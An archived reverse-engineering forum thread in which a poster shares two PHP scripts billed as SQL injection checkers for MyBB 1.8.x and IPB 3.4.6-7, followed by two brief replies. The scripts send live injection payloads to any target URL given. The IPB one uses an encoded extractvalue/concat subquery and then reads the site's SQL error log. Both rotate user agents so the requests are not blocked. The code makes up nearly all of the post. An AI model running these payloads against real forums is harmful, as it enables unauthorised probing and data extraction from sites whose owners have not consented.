+- The Bytecode Club - Reverse Engineering Forum (https://the.bytecode.club)
+-- Forum: Lobby (https://the.bytecode.club/forumdisplay.php?fid=1)
+--- Forum: Programming (https://the.bytecode.club/forumdisplay.php?fid=86)
+--- Thread: MyBB 1.8.X & IPB 3.4.6-7 SQLi Checker (/showthread.php?tid=386)
MyBB 1.8.X & IPB 3.4.6-7 SQLi Checker - Righteous - 01-20-2015
Mybb:
PHP Code:
<?php
if ( isset( $_GET[ 'q' ] ) )
{
$host = $_GET[ 'q' ];
//Making sure http or https is set
if ( substr( $host, 0, 4 ) == "http" )
{
$protocol = "http";
if ( substr( $host, 0, 5 ) == "https" )
{
$protocol = "https";
}
//Removing trailing slashes
if ( substr( $host, -1 ) == '/' )
{
$host = substr( $host, 0, -1 );
}
//Initial SQL Injection check
$newHost = $host . '/member.php';
$data = "regcheck1=®check2=true&username=makman&password=mukarram&password2=mukarram&email=mak@live.com&email2=mak@live.com&referrername=&imagestring=F7yR4&imagehash=1c1d0e6eae9c113f4ff65339e4b3079c&answer=4&allownotices=1&receivepms=1&pmnotice=1&subscriptionmethod=0&timezoneoffset=0&dstcorrection=2®time=1416039333&step=registration&action=do_register®submit=Submit+Registration!&question_id='";
$response = SendPost( $newHost, $data );
if ( strpos( $response, "You have an error in your SQL syntax" ) !== false )
{
printf( "%s is vulnerable to MyBB 1.8.X SQL Injection!", $host );
}
else
{
printf( "%s is not vulnerable to MyBB 1.8.X SQL Injection!", $host );
}
}
else
{
echo "Invalid host, needs to have a protocol -> http://apples.org/path/to/forums";
}
}
else
{
echo "Invalid parameters, are you drunk?";
}
//Dont get useragent blocked
function getRandomUserAgent()
{
$userAgents = array(
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6",
"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)",
"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)",
"Opera/9.20 (Windows NT 6.0; U; en)",
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.50",
"Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.02 [en]",
"Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; fr; rv:1.7) Gecko/20040624 Firefox/0.9",
"Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/48 (like Gecko) Safari/48"
);
$random = rand( 0, count( $userAgents ) - 1 );
return $userAgents[ $random ];
}
//Send a post request
function SendPost( $site, $post )
{
$ch = curl_init();
curl_setopt( $ch, CURLOPT_URL, "$site" );
curl_setopt( $ch, CURLOPT_RETURNTRANSFER, true );
curl_setopt( $ch, CURLOPT_USERAGENT, getRandomUserAgent() );
curl_setopt( $ch, CURLOPT_POSTFIELDS, $post );
$response = curl_exec( $ch );
curl_close( $ch );
return $response;
}
?>IPB:
PHP Code:
<?php
if (isset($_GET['q'])) {
$host = $_GET['q'];
//Ensures you have http or https in your domain name
if (substr($host, 0, 4) == "http") {
$protocol = "http";
if (substr($host, 0, 5) == "https") {
$protocol = "https";
}
//Removes any trailing slashes
if (substr($host, -1) == '/') {
$host = substr($host, 0, -1);
}
//Initial SQL Injection check
$newHost = $host . '/interface/ipsconnect/ipsconnect.php';
$sql = 'SELECT COUNT(*) FROM members';
$data = "act=login&idType=id&id[]=-1&id[]=-1%29%20and%201%21%3D%22%27%22%20and%20extractvalue%281%2Cconcat%280x3a%2C%28SELECT%20COUNT%28%2A%29%20FROM%20members%29%29%29%23%27";
$response = SendPost($newHost, $data);
//Checking the SQL Error Log for confirmation
$url = $host . '/cache/sql_error_latest.cgi';
$response = SendGet($url);
if (strpos($response, "XPATH syntax error") !== false) {
printf("%s is vulnerable to IPBoard 3.4.6 or 3.4.7 SQL Injection!", $host);
} else {
printf("%s is not vulnerable to IPBoard 3.4.6 or 3.4.7 SQL Injection!", $host);
}
return false;
} else {
echo "Invalid host, needs to have a protocol -> http://apples.org/path/to/forums";
}
} else {
echo "I think you're lost homie.";
}
//So you cant be blocked via useragent
function getRandomUserAgent()
{
$userAgents = array(
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6",
"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)",
"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)",
"Opera/9.20 (Windows NT 6.0; U; en)",
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.50",
"Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.02 [en]",
"Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; fr; rv:1.7) Gecko/20040624 Firefox/0.9",
"Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/48 (like Gecko) Safari/48"
);
$random = rand(0, count($userAgents) - 1);
return $userAgents[$random];
}
//Sends a post request
function SendPost($site, $post)
{
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "$site");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_USERAGENT, getRandomUserAgent());
curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
$response = curl_exec($ch);
curl_close($ch);
return $response;
}
//Sends a get request, specifically for reading the sql error cgi
function SendGet($site)
{
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "$site");
curl_setopt($ch, CURLOPT_USERAGENT, getRandomUserAgent());
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$response = curl_exec($ch);
curl_close($ch);
return $response;
}
?>RE: MyBB 1.8.X & IPB 3.4.6-7 SQLi Checker - Konloch - 01-20-2015
Why make this in PHP? Interesting none the less.
RE: MyBB 1.8.X & IPB 3.4.6-7 SQLi Checker - Righteous - 01-21-2015
(01-20-2015, 11:34 PM)Konloch Wrote: Why make this in PHP? Interesting none the less.
Because I wanted people who couldn't run the python script to be able to check their shit.